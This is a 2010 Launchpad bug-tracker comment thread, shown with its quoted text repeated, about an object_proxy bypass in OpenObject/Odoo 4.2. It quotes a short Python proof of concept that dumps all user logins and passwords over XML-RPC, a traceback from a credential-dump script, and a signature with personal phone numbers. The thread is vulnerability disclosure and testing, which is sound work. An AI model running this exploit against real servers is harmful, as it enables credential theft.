Odoo Server (MOVED TO GITHUB)

Bug #452373
Comment #7

Comment 7 for bug 452373

Revision history for this message

Nhomar - Vauxoo (nhomar) wrote on 2010-04-26: Re: [Bug 452373] Re: [4.2] Netsvc object_proxy bypass

Hi....

          ./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
  File "./get_all_users_pass.py", line 27, in <module>
    db_list = dbsock.list()
  File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
    errcode, errmsg, headers = h.getreply()
  File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
    response = self._conn.getresponse()
  File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
    response.begin()
  File "/usr/lib/python2.6/httplib.py", line 391, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.6/socket.py", line 397, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer

on revno: 1999

2010/4/26 Cristian Salamea (GnuThink) <email address hidden>

> Hi, i tested in stable revno.2041 and the xploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>

Hi....

on revno: 1999

2010/4/26 Cristian Salamea (GnuThink) <ovnicraft@gmail.com>

> Hi, i tested in stable revno.2041 and the xploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
>  print '  user: %s pass: %s' % (u['login'], u['password'])
>
>
>

-- 
Saludos Cordiales